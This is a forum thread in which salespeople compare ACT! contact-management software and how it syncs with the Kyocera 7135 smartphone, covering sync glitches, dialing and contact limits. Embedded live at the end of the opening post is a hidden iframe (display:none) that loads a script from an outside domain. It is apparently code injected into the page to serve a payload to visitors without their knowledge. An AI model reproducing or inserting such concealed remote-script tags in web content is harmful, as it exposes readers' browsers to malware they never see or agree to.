+ Reply to Thread

Best Syncable Sales Software?

In your opinion, what is the best Palm sales software that can be synced between a 7135 and a laptop?

I use Outlook currently, but will be in the field a lot, cold calling large numbers of prospects and eventually trying to keep good records on all of my clients (could be several hundred). My business is workplace insurance sales.

I am interested in traditional programs that have Palm conduits (ACT, etc.) and third party Palm applications that successfully integrate with a laptop program.

Also, I currently have a 6035 and have been considering upgrading to a 7135. Your thoughts regarding the stability of the 7135 for my application would be appreciated too.

Thank you for your opinions!

Nolan<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I use Act 2000 for Windows on my PC, and Action Names on my Kyo.

I have used Act for a number of years. I have also used Goldmine and other solutions and come back to Act. The devil I know...

It works okay. One problem is that if I put an appt into my Kyo and then sync, Act can't look up that contact name and properly insert the appointment into my PC database...so I have to manually do that. This is a significant limitation.

I am not interested in converting to Act for Palm as it is too all-encompassing for right now.

Thanks Richard .... I too have used Act in the past. Seems a bit problematic.

Nolan

Act does sync onto the Kyo quite nicely, though. The most recent notes transfer and it handles the addresses and contact info okay too. So it is quite workable aside from the limitation I mentioned. I have about 1350 records in mine and it works well on both the PC and the Kyo.

Thanks again Richard. It does sound like ACT in its latest version is the pick of the litter. I own version 4, which I never used, so I'll see what upgrading entails.

Best,

Nolan

Originally posted by richard
    Act does sync onto the Kyo quite nicely, though. The most recent notes transfer and it handles the addresses and contact info okay too. So it is quite workable aside from the limitation I mentioned. I have about 1350 records in mine and it works well on both the PC and the Kyo.
    I am presently using ACT! Ver 5 and Link for Palm OS. Has worked fine up to this point. Did a synch with the 7135 and the fields have gone askew... will have to figure that out. Small problem.

I have been an ACT! user since version 1.0 for DOS. Am thinking of upgrading to Version 6 and ACT! for Palm OS. Is this what you are using? Overall, what is your impression? Thanks much.

Murray

Act 6 with Act for Palm

I use Act version 6 with the Palm for Act program:

A few notes:

Act for 6 provides much better integration with PDA's.
    Address book can be shared with Outlook for email.
    Some other nifty new features, see their web site for details.

Palm for Act:
    Must be purchased as a separate application (or bundle).
    Its basically a "mini-me" version of Act. Works just like it's big brother with a limit of 10 notes / histories. I had over 3500 contacts in mine, I have it down to about 2300 now. Version 1.01 of the program (free update) is critical as speed on ver 1 was terrible. Ver 1.01 also allows you to dial the phone numbers with they Kyocera from withing the app. You do have to go to the contact first before dialing and really need a stylus to do this. I cut and paste the contacts I use most into my Palm Desktop, I don't want all my contacts listed there so this works well for me.

If you want all your conacts in the Palm Desktop then you can use the Act link, be carefull about using both at once as it might mess up syncs.

Rock
    Rock

Re: Act 6 with Act for Palm

Originally posted by Rock
    I use Act version 6 with the Palm for Act program:

A few notes:

Act for 6 provides much better integration with PDA's.
    Address book can be shared with Outlook for email.
    Some other nifty new features, see their web site for details.

Palm for Act:
    Must be purchased as a separate application (or bundle).
    Its basically a "mini-me" version of Act. Works just like it's big brother with a limit of 10 notes / histories. I had over 3500 contacts in mine, I have it down to about 2300 now. Version 1.01 of the program (free update) is critical as speed on ver 1 was terrible. Ver 1.01 also allows you to dial the phone numbers with they Kyocera from withing the app. You do have to go to the contact first before dialing and really need a stylus to do this. I cut and paste the contacts I use most into my Palm Desktop, I don't want all my contacts listed there so this works well for me.

If you want all your conacts in the Palm Desktop then you can use the Act link, be carefull about using both at once as it might mess up syncs.

Rock
    I suppose I have been put off by all of the horror stories regarding ACT! 6.X and ACT! for Palm OS on the ACT! forums. I am just itching to install both and get down to business. I have no need and do not use the Palm Desktop. Strictly ACT! on my desktop (although, having said that, I DO use the Palm Desktop for archiving TO-DO's, etc. at the moment). I am an ACT! Fanatic. Has been a love affair since ACT! Version 1.0 for DOS (which I still have somewhere). If I could get ACT! working on both my 7135 and my desktop I would be in 7th. Heaven. I have about 1200 contacts and am going to pare them down to about 800 this week.

Thank you for your input.

Murray

Act 6 Follow Up

Murray,

Where are the Act forums located? I would really like to go through them.

Overall Act 6 is working well for me, the only issue I have is sometimes when I try to go into the calendar the program freezes on me and I have to restart. I really am not sure that it is an Act issue however as I am having other problems with my PC acting up (running XP Pro). I think I have a program eating memory somewhere but I have no idea what program it may be.

I'd certainly be interested in checking the forums out to see what they say.

I didn't care for Act for Palm ver 1 as it was way to slow. Ver 1.01 has been perfect except for one thing that was strange, I recently cleaned out over 1,000 contacts from Act. I then went to settings and told it to do a desktop overwrites hand held sync (these take a while the first time). This freed up a lot of memory on the 7135. I then did another sync and it seemed to load up the database again (this time it was supposed to sync not reload the whole database). It ate up a bunch more memory, somehow the files must have been loaded twice? I rebooted, redid a desktop overwrites handheld, and then let it sync normally and it has been fine since. My guess is that was a weird one time thing, it never happened on my 515. Overall I am quite happy with Act for Palm and the new version is pretty fast, even with over 2000 contacts, the appointment linking to contacts has to be my favorite feature and my major gripe with outlook.

Rock
    Rock

Finally getting Act! 6.0

My company is finally upgrading to Act 6.0. I plan on installing the palm for OS and finally havg my database with me-on my phone. This has been a long-time dream of mine also. I have carried Palms alongside but am psyched to test this on the 7135.

I used to use addresspro and it carried over the database nicely but not sure how it would work dialing etc with the 7135. Anyone got any imput on this subject??

Act6 and Act for Palm

I've been using Act since the dos days, so I know my option is slanted. But the combination of Act 6 on the desktop and Act for Palm on the 7135 is great!!
    My laptop went down for 2 weeks, and I didn't loose a beat. Everything that I need to maintain my territory, I can carry in just the 7135. This combination is the best.
    If you've had issues with Act in the past, go to a software training company in your local area like "New Horizons". They have classes that should get you over the hump.

Act! for 7135!

Great to hear from a happy act! for palm user on the 7135!. I started with Act! with the original Windows product like 11 years ago. I got my company to use it and we are still with it. So I can say my affair with Act! goes way back also...

Questions:

Does it dial out?
    Does it lose your voice call seetings when it syncs?
    Can you add voice activated dialing to the database somehow?
    Does it have color?
    Any pitfalls?
    Forums?

Can't wait to get this thing going? Been a long time coming!!!!

Answers for Smoothop

Does it dial out?
    If you get the 1.01 version of Act for Palm
    Does it lose your voice call seetings when it syncs?
    I don't use any voice call settings, so I don't know.
    Can you add voice activated dialing to the database somehow?
    To the best of my knowledge, that feature of the phone, has not been incorporated into the Act software.
    Does it have color?
    No.
    Any pitfalls?
    It will allow you to record email address information, but for now, it will not integrate with a e-mail program to send letters directly from "Act for Palm". You can see that they have put time into writing the e-mail address portion of the database, but have to finished the software integration portion of it yet. What I do now when I sync is;
    1)Sync first between Act 6 and Act for Palm( a stand alone database on the Palm side of the 7135)
    2)Instruct the Act for Palm to "DO Nothing", and use Act Link to drop all of the Act information in the Palm database, including the primary email addresses. Then if I want to send an email directly from the phone, I open this database, and when I select a e-mail address from the Palm database, it will fire up the email software.
    Forums?
    Yes, there are forums on the Act website.

Thank you for the reply. Monday I get the 7135 empowered with Act!. This is gonna be huge for me and my job. I have over 1500 contacts going in. I have struggled with multiple devices over the years with batteries, crashes, bad laptops, bad phones, bad service on phones, pagers, multiple voice mails, multiple phones,... But now....

The 7135- All in one baby!!!!!!

Because I had such luck already, using Addresspro with my Act! database on my OLD Palm VIIx, I know I am gonna love this.

Now I'm wired up. The 7135 is amazing. Act! for palm works great on the 7135. Now I gotta get out and sell...